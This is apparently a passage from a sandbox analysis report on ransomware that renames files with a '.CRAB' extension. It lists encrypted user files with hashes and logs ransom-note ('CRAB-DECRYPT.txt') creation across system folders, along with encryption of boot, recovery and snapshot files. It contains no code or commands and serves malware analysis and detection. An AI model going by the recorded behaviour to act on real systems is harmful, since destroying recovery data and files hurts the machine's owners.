c:\users\5p5nrgjn0js halpmcxz\pictures\eoea 7ezs8omtg ag\urbg52buejvqouxzd\zeauwoyx\ixlz1vw89rj9\mwsjt5p5\rfy_dconpjgk3xec\t_3nacxnqmqjsybqv75.bmp.crab	3.55 KB	MD5: 96b47bd1ecaf3fa8a7975b98e4f7f621 SHA1: 8ea7cac757e07fedf11b9ef30623483257954e71 SHA256: af44db1c83701305f950056ca59b31f82128867ace472c25d946a66e730d1224	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\pictures\eoea 7ezs8omtg ag\urbg52buejvqouxzd\zeauwoyx\ixlz1vw89rj9\mwsjt5p5\s9kyxdu.gif.crab	94.91 KB	MD5: 9491f5d5e57730f57027291ef09104aa SHA1: 162e546ac1153e7f42a2ab6da1427414de67adf1 SHA256: e2d70fa51938900fca1f37ea14de216c158cd79ea6a2b85eb6b81aba9e3b7960	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\pictures\eoea 7ezs8omtg ag\urbg52buejvqouxzd\zeauwoyx\ixlz1vw89rj9\mwsjt5p5\tdw_upbls-pydxlk.gif.crab	40.15 KB	MD5: 746065c88131162fb1fa15c7bed81ff4 SHA1: d4f893e0d846f804cc4e3c7b70218485882bc868 SHA256: 0eb8bb4b2f378ab938d4bc260759efac3eaac24d033b783daa073f511c3ac2a3	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\pictures\eoea 7ezs8omtg ag\urbg52buejvqouxzd\zeauwoyx\ixlz1vw89rj9\mwsjt5p5\vra-ggfsnftqgb\itrclimsmj0dcfoj.jpg.crab	1.52 KB	MD5: 123cf2fcdd518f129a07479516700ec2 SHA1: 14afdc80235cbb832891cd2a5afdfb240ae66e52 SHA256: 8218b0a04a58fb1b51380b4775586bf817a9b35b7f73303715f3d278d1fdb726	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\pictures\eoea 7ezs8omtg ag\urbg52buejvqouxzd\zeauwoyx\ixlz1vw89rj9\mwsjt5p5\vra-ggfsnftqgb\_1kxs3qbwtelt4.png.crab	41.66 KB	MD5: 6686dde0b201aeb2dab1c8b8503d38b8 SHA1: 92a47abc9a325927f5759ee92abfbe02fe39479a SHA256: cb304e0906efee6778cd12a87b597a80886e1c8f9f532b5cd5625e31879603ac	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\pictures\eoea 7ezs8omtg ag\urbg52buejvqouxzd\zeauwoyx\ixlz1vw89rj9\r-ttiu3apxzsk-umvp.jpg.crab	93.45 KB	MD5: aadcb6d705aa8bccc460a32331b91680 SHA1: 41957aa7a494250b92b692ba960bec4226432730 SHA256: 2277f1ee083e517f60b0b47880ae3b6ea3f7e33d26f155e05af41800106b0f0e	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\pictures\eoea 7ezs8omtg ag\urbg52buejvqouxzd\zeauwoyx\qfs5n -.bmp.crab	69.27 KB	MD5: 6e4baedf2cefb7c748640dab05104679 SHA1: a41e76e38ec1188d4ee42f5da11d574e55766f0e SHA256: 4038ee4e224b694c9f35bc1666bdd3e977a36da6c39e206320a57d1044d1fa5b	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\pictures\eoea 7ezs8omtg ag\urbg52buejvqouxzd\_6pb1f31iq38d fn.gif.crab	56.49 KB	MD5: 39b3a822ecff56aecbcc66dd9dd11a07 SHA1: 3594857d7000169399410a3e66bc8f7429dfd13d SHA256: ebf6beda7b0ebd760398d1b6ed91278b3641c4458df2dd2d646cb1566ef1f909	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\pictures\eoea 7ezs8omtg ag\x1sa80v6zv9l\nb5xeyr_9qv.jpg.crab	98.80 KB	MD5: 4bee8d668f642532563cba417883afa8 SHA1: eee84dcdaee086bdc2e2912367bf5edb866dcc01 SHA256: f7a561eed3b028a3ca4b41f108fc2ef878214764646e77ee702040aed17214cc	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\pictures\eoea 7ezs8omtg ag\x1sa80v6zv9l\vhpku6m.bmp.crab	20.09 KB	MD5: 035f4ee9210be95be18502eb7cc9400c SHA1: 0d59624080dced2f9d8de287dd457ff8457e25ee SHA256: 77dcfabfce9d4e1d47fa3fa764a04914e054daf0c1553e150585492bcb272797	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\pictures\eoea 7ezs8omtg ag\x1sa80v6zv9l\x8fcoh mjddf.bmp.crab	31.96 KB	MD5: e1b4269db63a4d30914a9947557372ab SHA1: f0db4dc7c844077f1f45bae7fb3f7e558c4952e6 SHA256: b3efe684ee32384584d529317f9d1abd66b5e8d8f1379296f3ddba1aa741e267	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\pictures\inlkuecmd1i-hl_.png.crab	19.85 KB	MD5: da662d0f4411d610613926e7d495c019 SHA1: 5cc18f38519134d1ed0377f238900e3b855d22fc SHA256: d10b3fe46f8d257353268b1b6414bf57eb430378de0de7c534ee7050d95e8f19	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\pictures\z6uq\jdqsvpalc.jpg.crab	38.73 KB	MD5: 1dd79e215d3baade7a24f1f1ecce94d3 SHA1: 87010d6749f92af18f53313cb1ad4077aaf14c67 SHA256: d9f6692fdcba44d8619ff0d0ce1b02de5e8255ec7ecbb04786a941ec84903ccb	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\pictures\z6uq\zugweh5ph-jz_gzwq_zm.jpg.crab	15.52 KB	MD5: 9434fee4f70c63df339ebca225f89c54 SHA1: 5aeb525f945998807602a76561eb8b6e09839cdd SHA256: c743bcdc7ad75811de7b2581142470081b967814d1f1e1584e72b312810b8595	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\searches\everywhere.search-ms.crab	0.76 KB	MD5: 8378781b64f773f2de54024586a875a0 SHA1: 32f569a62687d50dff434d56f21f59f9879cb1bb SHA256: f05ef4dda6641f4759d41afd5e5b02cdf24c91eecc5845635bd12a1c4aafff7a	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\searches\indexed locations.search-ms.crab	0.76 KB	MD5: 7a39fa261b9613e1780a93f704b01e57 SHA1: 633e23bf50d95d1e4da9c39552bd43f61e75a513 SHA256: bb9acf4918d17c58f3df332fdf43f2a4ba1a6fd65602c82607246c78b37134fe	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\videos\28tepkgm7spdm1k.flv.crab	67.45 KB	MD5: 98f3d02e4e282b1a8ff29b582063f32c SHA1: 3ccf4ed746e7bd55f4d6a63b0203ef93a01549cd SHA256: 5ba54be47f6104a4f288c4782c36330b290ed38007ce9b43b7dd54d522fd6311	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\videos\6rosludx8yp\2ujjzge4.avi.crab	37.87 KB	MD5: cf79ec8558dd113dc86eb8e38a44531d SHA1: 3ab124016cd835b25288617c175ef9ae9ebc3ef7 SHA256: f4370dcfb21e5743b2485507d9cb8fd496a6d5e419fd2c043c94d1c93addd8b9	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\videos\6rosludx8yp\3bcdt ywv3usd.mkv.crab	73.20 KB	MD5: 41c70fa999887d235849b45314309fa3 SHA1: 4af7b48e0db2aeb7fd97d4e9319142fab84d240c SHA256: 97829e817a5d07deda1a4984d41d9fdb4fa0ae4c3c69ffb399fa5eb76aa758d7	... File Actions Show Properties Download

Modified Files

Filename	File Size	Hash Values	YARA Match	Actions
c:\programdata\microsoft\crypto\rsa\s-1-5-18\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f	0.05 KB	MD5: 0d7db7ff842f89a36b58fa2541de2a6c SHA1: 50f3b486f99fb22648d26870e7a5cba01caed3da SHA256: 140eda45fe001c0fe47edd7fc509ff1882d46fbcb7c7437d893c1fb83012e433		... File Actions Show Properties Download

Host Behavior

File (4736)

Operation	Filename	Additional Information	Count	Logfile
Create	C:\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\$Recycle.Bin\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\$Recycle.Bin\S-1-5-21-3388679973-3930757225-3770151564-1000\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\bootmgr.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Config.Msi\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Documents and Settings\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\MSOCache\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\PerfLogs\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\PerfLogs\Admin\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files\Microsoft SQL Server Compact Edition\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files\Microsoft SQL Server Compact Edition\v3.5\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files\Microsoft SQL Server Compact Edition\v3.5\Desktop\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Recovery\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\System Volume Information\SPP\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\System Volume Information\SPP\OnlineMetadataCache\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\System Volume Information\SPP\OnlineMetadataCache\{00c95144-e912-40b3-a2d1-b8e12bc815d0}_OnDiskSnapshotProp.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\OnlineMetadataCache\{1ce95dd8-c40b-44fd-a9e6-d72d44ed8f39}_OnDiskSnapshotProp.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\OnlineMetadataCache\{1e9425cc-553b-418f-b0c6-ad1ac9e1ba0c}_OnDiskSnapshotProp.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\OnlineMetadataCache\{29088c66-de5f-456f-85c0-6e4156f94358}_OnDiskSnapshotProp.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\OnlineMetadataCache\{29296136-1f54-4fd8-b5c7-32fc96ef3c76}_OnDiskSnapshotProp.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\OnlineMetadataCache\{4204ee1b-0338-4788-b199-d83e4955faf1}_OnDiskSnapshotProp.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\OnlineMetadataCache\{425865b3-1a09-4be3-8a97-1baffda74ed0}_OnDiskSnapshotProp.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\OnlineMetadataCache\{51296d62-5aa5-412e-9a8f-abe77cd15e9e}_OnDiskSnapshotProp.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\OnlineMetadataCache\{5ac56584-2304-47b9-b262-8d3164a52d9e}_OnDiskSnapshotProp.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\OnlineMetadataCache\{77ac2c2c-d323-4d07-bbbc-9f6908de6f91}_OnDiskSnapshotProp.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\OnlineMetadataCache\{7a521dbe-9658-44e5-843c-29dd5c50d136}_OnDiskSnapshotProp.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\OnlineMetadataCache\{8000ffcd-1da9-461e-a8a6-b9c248869570}_OnDiskSnapshotProp.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\OnlineMetadataCache\{8002c55b-b05c-402e-b80d-41cead61f984}_OnDiskSnapshotProp.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\OnlineMetadataCache\{9069688d-befb-4294-b8a6-15447e1f812d}_OnDiskSnapshotProp.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\OnlineMetadataCache\{a8f69a00-bbec-42a5-a3ef-bf81814bd449}_OnDiskSnapshotProp.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\OnlineMetadataCache\{b46f41ee-ab11-4c6a-890b-df55c28a4b11}_OnDiskSnapshotProp.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\OnlineMetadataCache\{bbee4aba-5da4-47f0-bd54-17c95dfb7e64}_OnDiskSnapshotProp.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\OnlineMetadataCache\{c3f59859-dd84-4710-b6be-740f016ad023}_OnDiskSnapshotProp.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\OnlineMetadataCache\{c4c23d0f-5069-470f-9760-27eb797f66c2}_OnDiskSnapshotProp.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\OnlineMetadataCache\{c861246c-5d84-4ff4-a753-bad4631d65ca}_OnDiskSnapshotProp.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\OnlineMetadataCache\{cb7f5435-7d84-4f72-a889-a21e062f0cb6}_OnDiskSnapshotProp.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\OnlineMetadataCache\{dbab67da-647a-401e-a02b-58c06249c638}_OnDiskSnapshotProp.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\OnlineMetadataCache\{ee224d27-954d-4040-87c6-066b5517487c}_OnDiskSnapshotProp.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\SppCbsHiveStore\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\System Volume Information\SPP\SppGroupCache\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\System Volume Information\SPP\SppGroupCache\{00C95144-E912-40B3-A2D1-B8E12BC815D0}_DriverPackageInfo.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\SppGroupCache\{00C95144-E912-40B3-A2D1-B8E12BC815D0}_WindowsUpdateInfo.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\SppGroupCache\{1CE95DD8-C40B-44FD-A9E6-D72D44ED8F39}_DriverPackageInfo.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\SppGroupCache\{1CE95DD8-C40B-44FD-A9E6-D72D44ED8F39}_WindowsUpdateInfo.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\SppGroupCache\{1E9425CC-553B-418F-B0C6-AD1AC9E1BA0C}_DriverPackageInfo.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\SppGroupCache\{1E9425CC-553B-418F-B0C6-AD1AC9E1BA0C}_WindowsUpdateInfo.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\SppGroupCache\{29088C66-DE5F-456F-85C0-6E4156F94358}_DriverPackageInfo.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\SppGroupCache\{29088C66-DE5F-456F-85C0-6E4156F94358}_WindowsUpdateInfo.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\SppGroupCache\{29296136-1F54-4FD8-B5C7-32FC96EF3C76}_DriverPackageInfo.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\SppGroupCache\{29296136-1F54-4FD8-B5C7-32FC96EF3C76}_WindowsUpdateInfo.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\SppGroupCache\{4204EE1B-0338-4788-B199-D83E4955FAF1}_DriverPackageInfo.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\SppGroupCache\{4204EE1B-0338-4788-B199-D83E4955FAF1}_WindowsUpdateInfo.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\SppGroupCache\{425865B3-1A09-4BE3-8A97-1BAFFDA74ED0}_DriverPackageInfo.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\SppGroupCache\{425865B3-1A09-4BE3-8A97-1BAFFDA74ED0}_WindowsUpdateInfo.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\SppGroupCache\{51296D62-5AA5-412E-9A8F-ABE77CD15E9E}_DriverPackageInfo.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\SppGroupCache\{51296D62-5AA5-412E-9A8F-ABE77CD15E9E}_WindowsUpdateInfo.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\SppGroupCache\{5AC56584-2304-47B9-B262-8D3164A52D9E}_DriverPackageInfo.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\SppGroupCache\{5AC56584-2304-47B9-B262-8D3164A52D9E}_WindowsUpdateInfo.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\SppGroupCache\{77AC2C2C-D323-4D07-BBBC-9F6908DE6F91}_DriverPackageInfo.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\SppGroupCache\{77AC2C2C-D323-4D07-BBBC-9F6908DE6F91}_WindowsUpdateInfo.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\SppGroupCache\{7A521DBE-9658-44E5-843C-29DD5C50D136}_DriverPackageInfo.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\SppGroupCache\{7A521DBE-9658-44E5-843C-29DD5C50D136}_WindowsUpdateInfo.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\SppGroupCache\{8000FFCD-1DA9-461E-A8A6-B9C248869570}_DriverPackageInfo.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\SppGroupCache\{8000FFCD-1DA9-461E-A8A6-B9C248869570}_WindowsUpdateInfo.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\SppGroupCache\{8002C55B-B05C-402E-B80D-41CEAD61F984}_DriverPackageInfo.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\SppGroupCache\{8002C55B-B05C-402E-B80D-41CEAD61F984}_WindowsUpdateInfo.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\SppGroupCache\{9069688D-BEFB-4294-B8A6-15447E1F812D}_DriverPackageInfo.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\SppGroupCache\{9069688D-BEFB-4294-B8A6-15447E1F812D}_WindowsUpdateInfo.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\SppGroupCache\{A8F69A00-BBEC-42A5-A3EF-BF81814BD449}_DriverPackageInfo.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\SppGroupCache\{A8F69A00-BBEC-42A5-A3EF-BF81814BD449}_WindowsUpdateInfo.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\SppGroupCache\{B46F41EE-AB11-4C6A-890B-DF55C28A4B11}_DriverPackageInfo.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\SppGroupCache\{B46F41EE-AB11-4C6A-890B-DF55C28A4B11}_WindowsUpdateInfo.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\SppGroupCache\{BBEE4ABA-5DA4-47F0-BD54-17C95DFB7E64}_DriverPackageInfo.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\SppGroupCache\{BBEE4ABA-5DA4-47F0-BD54-17C95DFB7E64}_WindowsUpdateInfo.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\SppGroupCache\{C3F59859-DD84-4710-B6BE-740F016AD023}_DriverPackageInfo.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\SppGroupCache\{C3F59859-DD84-4710-B6BE-740F016AD023}_WindowsUpdateInfo.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\System Volume Information\SPP\SppGroupCache\{C4C23D0F-5069-470F-9760-27EB797F66C2}_DriverPackageInfo.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
